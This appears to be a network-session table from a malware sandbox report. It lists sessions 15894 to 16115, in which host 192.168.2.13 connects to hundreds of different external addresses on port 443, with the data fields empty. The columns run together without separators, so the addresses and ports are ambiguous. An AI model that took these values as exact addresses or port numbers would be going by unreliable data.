                                    15894192.168.2.1355184109.176.105.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15895192.168.2.134174290.254.197.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15896192.168.2.1332990194.213.47.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15897192.168.2.1335810118.105.73.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15898192.168.2.1354516204.139.188.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15899192.168.2.134180843.117.4.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15900192.168.2.1348076164.21.44.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15901192.168.2.1346466187.86.125.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15902192.168.2.1355966165.163.198.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15903192.168.2.134540041.110.235.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15904192.168.2.1353162156.230.116.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15905192.168.2.1339340207.122.166.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15906192.168.2.135383277.0.20.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15907192.168.2.134734635.6.73.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15908192.168.2.133579297.25.10.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15909192.168.2.1333772128.95.147.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15910192.168.2.134728078.206.119.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15911192.168.2.1348582166.245.229.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15912192.168.2.1342680119.71.185.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15913192.168.2.1359056192.106.193.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15914192.168.2.1344970137.9.144.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15915192.168.2.1359284192.101.72.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15916192.168.2.1335772128.140.82.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15917192.168.2.135833062.235.119.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15918192.168.2.1340244123.155.152.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15919192.168.2.1336980186.249.96.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15920192.168.2.1360420177.179.163.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15921192.168.2.1348258210.218.24.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15922192.168.2.135066448.202.136.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15923192.168.2.1360770161.246.65.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15924192.168.2.1338296191.72.36.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15925192.168.2.135475640.186.49.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15926192.168.2.1341782211.20.114.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15927192.168.2.1335440137.154.111.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15928192.168.2.133976451.94.14.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15929192.168.2.135157444.160.61.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15930192.168.2.1357814103.124.218.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15931192.168.2.134935440.125.111.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15932192.168.2.13603805.171.145.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15933192.168.2.1348050119.7.84.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15934192.168.2.1355796171.163.56.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15935192.168.2.133810831.179.64.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15936192.168.2.1356694115.23.185.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15937192.168.2.133422268.183.196.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15938192.168.2.1339086156.26.127.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15939192.168.2.133290693.182.187.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15940192.168.2.135326286.126.4.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15941192.168.2.1332892194.5.35.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15942192.168.2.13328768.13.96.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15943192.168.2.135653284.159.127.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15944192.168.2.133431649.206.241.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15945192.168.2.133988871.190.141.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15946192.168.2.1345420207.213.84.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15947192.168.2.1336114122.203.73.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15948192.168.2.133950644.195.169.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15949192.168.2.134461286.82.196.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15950192.168.2.134341452.186.142.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15951192.168.2.1339166206.250.2.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15952192.168.2.134622253.162.108.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15953192.168.2.1341544194.61.156.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15954192.168.2.1348816172.11.40.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15955192.168.2.133902079.153.79.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15956192.168.2.1356858111.162.159.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15957192.168.2.134596454.68.47.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15958192.168.2.135309436.157.216.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15959192.168.2.1351920107.182.234.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15960192.168.2.1337478133.89.124.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15961192.168.2.134535672.152.245.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15962192.168.2.134033632.87.138.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15963192.168.2.1346252144.178.41.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15964192.168.2.13437782.149.13.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15965192.168.2.135244214.252.58.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15966192.168.2.135495865.238.11.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15967192.168.2.1345568136.221.98.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15968192.168.2.135221071.169.125.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15969192.168.2.13430264.247.113.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15970192.168.2.135766259.6.177.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15971192.168.2.1350204220.156.182.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15972192.168.2.1333296177.39.66.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15973192.168.2.1344146156.199.43.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15974192.168.2.1356650102.64.123.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15975192.168.2.1343808220.48.212.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15976192.168.2.133524491.142.77.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15977192.168.2.1332802157.116.190.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15978192.168.2.1358682187.124.69.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15979192.168.2.1342660217.147.204.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15980192.168.2.1357690117.81.229.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15981192.168.2.135363684.124.196.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15982192.168.2.1352646118.181.120.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15983192.168.2.1337906198.219.125.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15984192.168.2.135518078.202.139.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15985192.168.2.135280046.115.250.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15986192.168.2.134209653.99.14.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15987192.168.2.1341556116.146.147.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15988192.168.2.1352056145.11.175.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15989192.168.2.1350406175.146.220.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15990192.168.2.1358510189.127.43.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15991192.168.2.1341454184.18.145.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15992192.168.2.134719624.92.41.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15993192.168.2.1350790137.201.127.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15994192.168.2.13365545.107.85.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15995192.168.2.1357560205.45.125.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15996192.168.2.1335040167.81.198.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15997192.168.2.1333230198.160.97.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15998192.168.2.1344380160.144.178.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15999192.168.2.135386860.51.116.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16000192.168.2.1333368205.84.127.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16001192.168.2.135696278.51.118.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16002192.168.2.135838086.218.163.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16003192.168.2.133909271.82.91.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16004192.168.2.1346290189.179.3.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16005192.168.2.135461057.64.93.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16006192.168.2.1341718220.229.171.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16007192.168.2.136009652.14.195.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16008192.168.2.1354166160.221.40.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16009192.168.2.1355110204.145.14.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16010192.168.2.135708864.118.71.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16011192.168.2.135588093.43.145.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16012192.168.2.1353274192.84.46.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16013192.168.2.1342928164.195.138.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16014192.168.2.1343290185.196.85.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16015192.168.2.133891239.56.9.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16016192.168.2.135255044.243.160.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16017192.168.2.13520185.143.232.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16018192.168.2.1353374152.103.114.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16019192.168.2.1352632195.135.204.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16020192.168.2.1336852134.96.133.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16021192.168.2.1343070165.0.234.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16022192.168.2.133939658.233.44.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16023192.168.2.1359066145.211.89.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16024192.168.2.1347342133.157.152.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16025192.168.2.134526484.113.10.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16026192.168.2.133348223.64.202.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16027192.168.2.1348838194.189.76.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16028192.168.2.1343708161.82.67.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16029192.168.2.1348224105.230.226.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16030192.168.2.1358734212.129.224.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16031192.168.2.1341542166.43.224.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16032192.168.2.135924074.35.243.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16033192.168.2.1360010102.12.190.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16034192.168.2.1355502179.204.108.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16035192.168.2.1334026210.61.238.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16036192.168.2.133770699.195.104.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16037192.168.2.133891473.68.132.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16038192.168.2.1337666202.56.6.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16039192.168.2.135436859.217.19.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16040192.168.2.1345566171.149.79.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16041192.168.2.1353644188.23.155.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16042192.168.2.134883465.100.105.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16043192.168.2.1342446219.42.68.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16044192.168.2.1342712188.222.252.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16045192.168.2.1349838123.21.242.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16046192.168.2.1344598209.81.32.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16047192.168.2.135583695.222.14.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16048192.168.2.1345918198.68.32.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16049192.168.2.1341386144.194.13.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16050192.168.2.135590897.19.15.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16051192.168.2.134150838.183.218.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16052192.168.2.1348546185.193.146.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16053192.168.2.1334642106.51.127.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16054192.168.2.1355140144.152.140.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16055192.168.2.1346284101.132.30.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16056192.168.2.1346686200.114.91.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16057192.168.2.134967296.18.238.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16058192.168.2.1337214202.251.218.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16059192.168.2.133511291.199.182.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16060192.168.2.134691457.126.89.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16061192.168.2.134400246.254.56.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16062192.168.2.1347166140.204.82.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16063192.168.2.133872880.66.184.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16064192.168.2.134256854.62.73.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16065192.168.2.1348960159.113.191.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16066192.168.2.1343706204.163.1.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16067192.168.2.1341284151.235.152.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16068192.168.2.1351050191.127.21.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16069192.168.2.135664083.0.32.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16070192.168.2.1357676100.156.147.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16071192.168.2.1332802114.137.38.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16072192.168.2.1360156212.241.116.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16073192.168.2.13525565.12.109.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16074192.168.2.133939059.148.161.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16075192.168.2.134201660.29.131.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16076192.168.2.1338618157.139.64.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16077192.168.2.1347538107.101.45.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16078192.168.2.1357906212.98.112.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16079192.168.2.1334178154.251.223.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16080192.168.2.1351124184.187.207.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16081192.168.2.1343364143.120.63.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16082192.168.2.134009468.20.218.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16083192.168.2.1333846202.70.193.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16084192.168.2.1359080162.162.9.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16085192.168.2.135495831.89.224.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16086192.168.2.1334108190.118.40.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16087192.168.2.1334806109.189.34.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16088192.168.2.1358278218.38.34.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16089192.168.2.135197254.86.138.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16090192.168.2.133790086.163.159.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16091192.168.2.1340642111.17.31.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16092192.168.2.1335476103.28.47.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16093192.168.2.133566493.120.156.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16094192.168.2.1336532126.252.192.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16095192.168.2.134487277.138.116.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16096192.168.2.1357406217.83.166.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16097192.168.2.1337622130.86.201.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16098192.168.2.135830237.133.17.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16099192.168.2.135063031.2.131.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16100192.168.2.1346460208.47.238.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16101192.168.2.1346920109.136.109.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16102192.168.2.13562205.187.11.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16103192.168.2.134883847.91.30.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16104192.168.2.1337284188.156.44.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16105192.168.2.1357562202.136.1.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16106192.168.2.134933232.175.29.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16107192.168.2.134378246.190.189.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16108192.168.2.134203241.24.54.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16109192.168.2.135602057.54.30.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16110192.168.2.133938048.70.187.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16111192.168.2.134396479.204.81.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16112192.168.2.135805420.70.101.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16113192.168.2.1340558111.169.143.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16114192.168.2.1351626210.137.102.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16115192.168.2.1350308132.167.119.141443
                                    TimestampBytes transferredDirectionData


